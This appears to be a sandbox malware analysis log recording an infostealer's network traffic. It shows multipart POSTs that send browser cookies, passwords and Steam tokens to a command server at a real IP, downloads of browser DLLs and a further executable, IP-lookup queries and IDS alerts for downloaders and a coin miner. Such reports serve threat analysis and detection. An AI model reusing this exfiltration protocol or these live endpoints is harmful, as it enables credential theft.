Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----DBKEHDGDGHCBGCAKFIIIHost: 147.45.68.138Content-Length: 331Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 44 42 4b 45 48 44 47 44 47 48 43 42 47 43 41 4b 46 49 49 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 64 35 35 64 62 32 32 31 62 65 38 65 66 63 36 31 66 63 62 32 64 66 62 64 62 31 61 64 32 64 30 38 0d 0a 2d 2d 2d 2d 2d 2d 44 42 4b 45 48 44 47 44 47 48 43 42 47 43 41 4b 46 49 49 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 36 65 65 62 35 64 66 66 31 64 34 37 39 64 30 38 32 66 37 37 66 32 63 39 30 31 37 63 33 62 66 35 0d 0a 2d 2d 2d 2d 2d 2d 44 42 4b 45 48 44 47 44 47 48 43 42 47 43 41 4b 46 49 49 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 6f 64 65 22 0d 0a 0d 0a 31 0d 0a 2d 2d 2d 2d 2d 2d 44 42 4b 45 48 44 47 44 47 48 43 42 47 43 41 4b 46 49 49 49 2d 2d 0d 0a Data Ascii: ------DBKEHDGDGHCBGCAKFIIIContent-Disposition: form-data; name="token"d55db221be8efc61fcb2dfbdb1ad2d08------DBKEHDGDGHCBGCAKFIIIContent-Disposition: form-data; name="build_id"6eeb5dff1d479d082f77f2c9017c3bf5------DBKEHDGDGHCBGCAKFIIIContent-Disposition: form-data; name="mode"1------DBKEHDGDGHCBGCAKFIII--
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----DHIJEHJDHJKECBFHDHDHHost: 147.45.68.138Content-Length: 331Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 44 48 49 4a 45 48 4a 44 48 4a 4b 45 43 42 46 48 44 48 44 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 64 35 35 64 62 32 32 31 62 65 38 65 66 63 36 31 66 63 62 32 64 66 62 64 62 31 61 64 32 64 30 38 0d 0a 2d 2d 2d 2d 2d 2d 44 48 49 4a 45 48 4a 44 48 4a 4b 45 43 42 46 48 44 48 44 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 36 65 65 62 35 64 66 66 31 64 34 37 39 64 30 38 32 66 37 37 66 32 63 39 30 31 37 63 33 62 66 35 0d 0a 2d 2d 2d 2d 2d 2d 44 48 49 4a 45 48 4a 44 48 4a 4b 45 43 42 46 48 44 48 44 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 6f 64 65 22 0d 0a 0d 0a 32 0d 0a 2d 2d 2d 2d 2d 2d 44 48 49 4a 45 48 4a 44 48 4a 4b 45 43 42 46 48 44 48 44 48 2d 2d 0d 0a Data Ascii: ------DHIJEHJDHJKECBFHDHDHContent-Disposition: form-data; name="token"d55db221be8efc61fcb2dfbdb1ad2d08------DHIJEHJDHJKECBFHDHDHContent-Disposition: form-data; name="build_id"6eeb5dff1d479d082f77f2c9017c3bf5------DHIJEHJDHJKECBFHDHDHContent-Disposition: form-data; name="mode"2------DHIJEHJDHJKECBFHDHDH--
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----HJJJJKEHCAKFBFHJKEHCHost: 147.45.68.138Content-Length: 332Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 48 4a 4a 4a 4a 4b 45 48 43 41 4b 46 42 46 48 4a 4b 45 48 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 64 35 35 64 62 32 32 31 62 65 38 65 66 63 36 31 66 63 62 32 64 66 62 64 62 31 61 64 32 64 30 38 0d 0a 2d 2d 2d 2d 2d 2d 48 4a 4a 4a 4a 4b 45 48 43 41 4b 46 42 46 48 4a 4b 45 48 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 36 65 65 62 35 64 66 66 31 64 34 37 39 64 30 38 32 66 37 37 66 32 63 39 30 31 37 63 33 62 66 35 0d 0a 2d 2d 2d 2d 2d 2d 48 4a 4a 4a 4a 4b 45 48 43 41 4b 46 42 46 48 4a 4b 45 48 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 6f 64 65 22 0d 0a 0d 0a 32 31 0d 0a 2d 2d 2d 2d 2d 2d 48 4a 4a 4a 4a 4b 45 48 43 41 4b 46 42 46 48 4a 4b 45 48 43 2d 2d 0d 0a Data Ascii: ------HJJJJKEHCAKFBFHJKEHCContent-Disposition: form-data; name="token"d55db221be8efc61fcb2dfbdb1ad2d08------HJJJJKEHCAKFBFHJKEHCContent-Disposition: form-data; name="build_id"6eeb5dff1d479d082f77f2c9017c3bf5------HJJJJKEHCAKFBFHJKEHCContent-Disposition: form-data; name="mode"21------HJJJJKEHCAKFBFHJKEHC--
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----IDBFHJDAAFBAKEBGIJKKHost: 147.45.68.138Content-Length: 5773Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /sql.dll HTTP/1.1Host: 147.45.68.138Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----IEBAAFCAFCBKFHJJJKKFHost: 147.45.68.138Content-Length: 829Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 49 45 42 41 41 46 43 41 46 43 42 4b 46 48 4a 4a 4a 4b 4b 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 64 35 35 64 62 32 32 31 62 65 38 65 66 63 36 31 66 63 62 32 64 66 62 64 62 31 61 64 32 64 30 38 0d 0a 2d 2d 2d 2d 2d 2d 49 45 42 41 41 46 43 41 46 43 42 4b 46 48 4a 4a 4a 4b 4b 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 36 65 65 62 35 64 66 66 31 64 34 37 39 64 30 38 32 66 37 37 66 32 63 39 30 31 37 63 33 62 66 35 0d 0a 2d 2d 2d 2d 2d 2d 49 45 42 41 41 46 43 41 46 43 42 4b 46 48 4a 4a 4a 4b 4b 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 51 32 39 76 61 32 6c 6c 63 31 78 48 62 32 39 6e 62 47 55 67 51 32 68 79 62 32 31 6c 58 30 52 6c 5a 6d 46 31 62 48 51 75 64 48 68 30 0d 0a 2d 2d 2d 2d 2d 2d 49 45 42 41 41 46 43 41 46 43 42 4b 46 48 4a 4a 4a 4b 4b 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 64 61 74 61 22 0d 0a 0d 0a 4c 6d 64 76 62 32 64 73 5a 53 35 6a 62 32 30 4a 52 6b 46 4d 55 30 55 4a 4c 77 6c 47 51 55 78 54 52 51 6b 78 4e 7a 45 79 4d 6a 6b 77 4f 44 41 79 43 55 35 4a 52 41 6b 31 4d 54 45 39 56 55 4a 6c 54 6b 4e 72 57 6a 4e 4d 4f 48 6c 59 59 33 67 34 63 57 67 30 53 6b 5a 56 57 47 74 33 61 30 35 44 4f 55 6c 79 5a 47 6c 53 5a 47 4a 71 55 31 52 71 63 56 4e 70 52 6d 67 34 56 33 4a 53 59 32 4a 4c 63 6c 39 79 54 30 70 69 5a 30 68 5a 4e 6c 52 42 4e 46 4a 55 4c 54 5a 77 63 7a 42 69 61 47 56 74 5a 6e 64 44 55 45 4a 7a 54 45 31 6e 55 46 51 33 4c 57 64 55 59 31 64 78 53 48 5a 61 64 6c 70 69 59 57 5a 50 63 47 74 78 55 6e 6b 77 5a 45 78 35 57 55 63 35 51 57 70 51 4d 6e 5a 69 56 55 4a 76 62 57 46 79 62 6d 4d 35 63 47 4e 61 56 6d 78 6f 53 47 74 56 5a 56 56 68 56 30 31 31 63 6b 51 77 52 30 64 59 65 56 63 77 4e 56 39 43 58 7a 46 4a 65 56 56 4f 57 55 56 46 54 47 31 35 63 56 4a 6e 43 69 35 6e 62 32 39 6e 62 47 55 75 59 32 39 74 43 56 52 53 56 55 55 4a 4c 77 6c 47 51 55 78 54 52 51 6b 78 4e 6a 6b 35 4d 44 63 78 4e 6a 51 77 43 54 46 51 58 30 70 42 55 67 6b 79 4d 44 49 7a 4c 54 45 77 4c 54 41 31 4c 54 41 32 43 67 3d 3d 0d 0a 2d 2d 2d 2d 2d 2d 49 45 42 41 41 46 43 41 46 43 42 4b 46 48 4a 4a 4a 4b 4b 46 2d 2d 0d 0a Data Ascii: ------IEBAAFCAFCBKFHJJJKKFContent-Disposition: form-data; name="token"d55db221be8efc61fcb2dfbdb1ad2d08------IEBAAFCAFCBKFHJJJKKFContent-Disposition: form-data; name="build_id"6eeb5dff1d479d082f77f2c9017c3bf5------IEBAAFCAFCBKFHJJJKKFContent-Disposition: form-data; name="file_name"Q29va2ll
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----DAKEHIJJKEGIDHIEHDAFHost: 147.45.68.138Content-Length: 437Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 44 41 4b 45 48 49 4a 4a 4b 45 47 49 44 48 49 45 48 44 41 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 64 35 35 64 62 32 32 31 62 65 38 65 66 63 36 31 66 63 62 32 64 66 62 64 62 31 61 64 32 64 30 38 0d 0a 2d 2d 2d 2d 2d 2d 44 41 4b 45 48 49 4a 4a 4b 45 47 49 44 48 49 45 48 44 41 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 36 65 65 62 35 64 66 66 31 64 34 37 39 64 30 38 32 66 37 37 66 32 63 39 30 31 37 63 33 62 66 35 0d 0a 2d 2d 2d 2d 2d 2d 44 41 4b 45 48 49 4a 4a 4b 45 47 49 44 48 49 45 48 44 41 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 63 47 46 7a 63 33 64 76 63 6d 52 7a 4c 6e 52 34 64 41 3d 3d 0d 0a 2d 2d 2d 2d 2d 2d 44 41 4b 45 48 49 4a 4a 4b 45 47 49 44 48 49 45 48 44 41 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 64 61 74 61 22 0d 0a 0d 0a 0d 0a 2d 2d 2d 2d 2d 2d 44 41 4b 45 48 49 4a 4a 4b 45 47 49 44 48 49 45 48 44 41 46 2d 2d 0d 0a Data Ascii: ------DAKEHIJJKEGIDHIEHDAFContent-Disposition: form-data; name="token"d55db221be8efc61fcb2dfbdb1ad2d08------DAKEHIJJKEGIDHIEHDAFContent-Disposition: form-data; name="build_id"6eeb5dff1d479d082f77f2c9017c3bf5------DAKEHIJJKEGIDHIEHDAFContent-Disposition: form-data; name="file_name"cGFzc3dvcmRzLnR4dA==------DAKEHIJJKEGIDHIEHDAFContent-Disposition: form-data; name="file_data"------DAKEHIJJKEGIDHIEHDAF--
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----HCBGDGCAAKJEBFIDBAAAHost: 147.45.68.138Content-Length: 437Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 48 43 42 47 44 47 43 41 41 4b 4a 45 42 46 49 44 42 41 41 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 64 35 35 64 62 32 32 31 62 65 38 65 66 63 36 31 66 63 62 32 64 66 62 64 62 31 61 64 32 64 30 38 0d 0a 2d 2d 2d 2d 2d 2d 48 43 42 47 44 47 43 41 41 4b 4a 45 42 46 49 44 42 41 41 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 36 65 65 62 35 64 66 66 31 64 34 37 39 64 30 38 32 66 37 37 66 32 63 39 30 31 37 63 33 62 66 35 0d 0a 2d 2d 2d 2d 2d 2d 48 43 42 47 44 47 43 41 41 4b 4a 45 42 46 49 44 42 41 41 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 63 47 46 7a 63 33 64 76 63 6d 52 7a 4c 6e 52 34 64 41 3d 3d 0d 0a 2d 2d 2d 2d 2d 2d 48 43 42 47 44 47 43 41 41 4b 4a 45 42 46 49 44 42 41 41 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 64 61 74 61 22 0d 0a 0d 0a 0d 0a 2d 2d 2d 2d 2d 2d 48 43 42 47 44 47 43 41 41 4b 4a 45 42 46 49 44 42 41 41 41 2d 2d 0d 0a Data Ascii: ------HCBGDGCAAKJEBFIDBAAAContent-Disposition: form-data; name="token"d55db221be8efc61fcb2dfbdb1ad2d08------HCBGDGCAAKJEBFIDBAAAContent-Disposition: form-data; name="build_id"6eeb5dff1d479d082f77f2c9017c3bf5------HCBGDGCAAKJEBFIDBAAAContent-Disposition: form-data; name="file_name"cGFzc3dvcmRzLnR4dA==------HCBGDGCAAKJEBFIDBAAAContent-Disposition: form-data; name="file_data"------HCBGDGCAAKJEBFIDBAAA--
Source: global traffic	HTTP traffic detected: GET /freebl3.dll HTTP/1.1Host: 147.45.68.138Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /mozglue.dll HTTP/1.1Host: 147.45.68.138Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /msvcp140.dll HTTP/1.1Host: 147.45.68.138Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /softokn3.dll HTTP/1.1Host: 147.45.68.138Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /vcruntime140.dll HTTP/1.1Host: 147.45.68.138Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /nss3.dll HTTP/1.1Host: 147.45.68.138Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----DAKEHIJJKEGIDHIEHDAFHost: 147.45.68.138Content-Length: 1025Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----HCAEHJJKFCAAFHJKFBKKHost: 147.45.68.138Content-Length: 331Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 48 43 41 45 48 4a 4a 4b 46 43 41 41 46 48 4a 4b 46 42 4b 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 64 35 35 64 62 32 32 31 62 65 38 65 66 63 36 31 66 63 62 32 64 66 62 64 62 31 61 64 32 64 30 38 0d 0a 2d 2d 2d 2d 2d 2d 48 43 41 45 48 4a 4a 4b 46 43 41 41 46 48 4a 4b 46 42 4b 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 36 65 65 62 35 64 66 66 31 64 34 37 39 64 30 38 32 66 37 37 66 32 63 39 30 31 37 63 33 62 66 35 0d 0a 2d 2d 2d 2d 2d 2d 48 43 41 45 48 4a 4a 4b 46 43 41 41 46 48 4a 4b 46 42 4b 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 6f 64 65 22 0d 0a 0d 0a 33 0d 0a 2d 2d 2d 2d 2d 2d 48 43 41 45 48 4a 4a 4b 46 43 41 41 46 48 4a 4b 46 42 4b 4b 2d 2d 0d 0a Data Ascii: ------HCAEHJJKFCAAFHJKFBKKContent-Disposition: form-data; name="token"d55db221be8efc61fcb2dfbdb1ad2d08------HCAEHJJKFCAAFHJKFBKKContent-Disposition: form-data; name="build_id"6eeb5dff1d479d082f77f2c9017c3bf5------HCAEHJJKFCAAFHJKFBKKContent-Disposition: form-data; name="mode"3------HCAEHJJKFCAAFHJKFBKK--
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----KEGDBFIJKEBGIDGDHCGCHost: 147.45.68.138Content-Length: 331Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 4b 45 47 44 42 46 49 4a 4b 45 42 47 49 44 47 44 48 43 47 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 64 35 35 64 62 32 32 31 62 65 38 65 66 63 36 31 66 63 62 32 64 66 62 64 62 31 61 64 32 64 30 38 0d 0a 2d 2d 2d 2d 2d 2d 4b 45 47 44 42 46 49 4a 4b 45 42 47 49 44 47 44 48 43 47 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 36 65 65 62 35 64 66 66 31 64 34 37 39 64 30 38 32 66 37 37 66 32 63 39 30 31 37 63 33 62 66 35 0d 0a 2d 2d 2d 2d 2d 2d 4b 45 47 44 42 46 49 4a 4b 45 42 47 49 44 47 44 48 43 47 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 6f 64 65 22 0d 0a 0d 0a 34 0d 0a 2d 2d 2d 2d 2d 2d 4b 45 47 44 42 46 49 4a 4b 45 42 47 49 44 47 44 48 43 47 43 2d 2d 0d 0a Data Ascii: ------KEGDBFIJKEBGIDGDHCGCContent-Disposition: form-data; name="token"d55db221be8efc61fcb2dfbdb1ad2d08------KEGDBFIJKEBGIDGDHCGCContent-Disposition: form-data; name="build_id"6eeb5dff1d479d082f77f2c9017c3bf5------KEGDBFIJKEBGIDGDHCGCContent-Disposition: form-data; name="mode"4------KEGDBFIJKEBGIDGDHCGC--
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----IEGCBFHJDHJJKFIDBGIJHost: 147.45.68.138Content-Length: 461Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 49 45 47 43 42 46 48 4a 44 48 4a 4a 4b 46 49 44 42 47 49 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 64 35 35 64 62 32 32 31 62 65 38 65 66 63 36 31 66 63 62 32 64 66 62 64 62 31 61 64 32 64 30 38 0d 0a 2d 2d 2d 2d 2d 2d 49 45 47 43 42 46 48 4a 44 48 4a 4a 4b 46 49 44 42 47 49 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 36 65 65 62 35 64 66 66 31 64 34 37 39 64 30 38 32 66 37 37 66 32 63 39 30 31 37 63 33 62 66 35 0d 0a 2d 2d 2d 2d 2d 2d 49 45 47 43 42 46 48 4a 44 48 4a 4a 4b 46 49 44 42 47 49 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 55 32 39 6d 64 46 78 54 64 47 56 68 62 56 78 7a 64 47 56 68 62 56 39 30 62 32 74 6c 62 6e 4d 75 64 48 68 30 0d 0a 2d 2d 2d 2d 2d 2d 49 45 47 43 42 46 48 4a 44 48 4a 4a 4b 46 49 44 42 47 49 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 64 61 74 61 22 0d 0a 0d 0a 31 39 36 6d 55 77 3d 3d 0d 0a 2d 2d 2d 2d 2d 2d 49 45 47 43 42 46 48 4a 44 48 4a 4a 4b 46 49 44 42 47 49 4a 2d 2d 0d 0a Data Ascii: ------IEGCBFHJDHJJKFIDBGIJContent-Disposition: form-data; name="token"d55db221be8efc61fcb2dfbdb1ad2d08------IEGCBFHJDHJJKFIDBGIJContent-Disposition: form-data; name="build_id"6eeb5dff1d479d082f77f2c9017c3bf5------IEGCBFHJDHJJKFIDBGIJContent-Disposition: form-data; name="file_name"U29mdFxTdGVhbVxzdGVhbV90b2tlbnMudHh0------IEGCBFHJDHJJKFIDBGIJContent-Disposition: form-data; name="file_data"196mUw==------IEGCBFHJDHJJKFIDBGIJ--
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----KKEHDBAEGIIIEBGCAAFHHost: 147.45.68.138Content-Length: 130725Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----EGHCBKKKFHCGCBFIJEHDHost: 147.45.68.138Content-Length: 331Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 45 47 48 43 42 4b 4b 4b 46 48 43 47 43 42 46 49 4a 45 48 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 64 35 35 64 62 32 32 31 62 65 38 65 66 63 36 31 66 63 62 32 64 66 62 64 62 31 61 64 32 64 30 38 0d 0a 2d 2d 2d 2d 2d 2d 45 47 48 43 42 4b 4b 4b 46 48 43 47 43 42 46 49 4a 45 48 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 36 65 65 62 35 64 66 66 31 64 34 37 39 64 30 38 32 66 37 37 66 32 63 39 30 31 37 63 33 62 66 35 0d 0a 2d 2d 2d 2d 2d 2d 45 47 48 43 42 4b 4b 4b 46 48 43 47 43 42 46 49 4a 45 48 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 6f 64 65 22 0d 0a 0d 0a 35 0d 0a 2d 2d 2d 2d 2d 2d 45 47 48 43 42 4b 4b 4b 46 48 43 47 43 42 46 49 4a 45 48 44 2d 2d 0d 0a Data Ascii: ------EGHCBKKKFHCGCBFIJEHDContent-Disposition: form-data; name="token"d55db221be8efc61fcb2dfbdb1ad2d08------EGHCBKKKFHCGCBFIJEHDContent-Disposition: form-data; name="build_id"6eeb5dff1d479d082f77f2c9017c3bf5------EGHCBKKKFHCGCBFIJEHDContent-Disposition: form-data; name="mode"5------EGHCBKKKFHCGCBFIJEHD--
Source: global traffic	HTTP traffic detected: GET /prog/66d7077a2064d_l.exe HTTP/1.1Host: 147.45.44.104Cache-Control: no-cache

Source: Joe Sandbox View	IP Address: 46.8.231.109 46.8.231.109
Source: Joe Sandbox View	IP Address: 185.215.113.100 185.215.113.100

Source: Joe Sandbox View	ASN Name: FIORD-ASIP-transitoperatorinRussiaUkraineandBaltics FIORD-ASIP-transitoperatorinRussiaUkraineandBaltics
Source: Joe Sandbox View	ASN Name: WHOLESALECONNECTIONSNL WHOLESALECONNECTIONSNL

Source: unknown	DNS query: name: api64.ipify.org
Source: unknown	DNS query: name: ipinfo.io
Source: unknown	DNS query: name: iplogger.org

Source: Network traffic	Suricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.6:49717 -> 147.45.44.104:80
Source: Network traffic	Suricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.6:49719 -> 147.45.44.104:80
Source: Network traffic	Suricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.6:49726 -> 154.216.17.178:80
Source: Network traffic	Suricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.6:49718 -> 31.41.244.9:80
Source: Network traffic	Suricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.6:49730 -> 176.111.174.109:80
Source: Network traffic	Suricata IDS: 2803304 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern HCa : 192.168.2.6:53026 -> 46.8.231.109:80
Source: Network traffic	Suricata IDS: 2803304 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern HCa : 192.168.2.6:53042 -> 147.45.44.104:80
Source: Network traffic	Suricata IDS: 2036289 - Severity 2 - ET COINMINER CoinMiner Domain in DNS Lookup (pool .hashvault .pro) : 192.168.2.6:55645 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2803304 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern HCa : 192.168.2.6:53051 -> 147.45.44.104:80
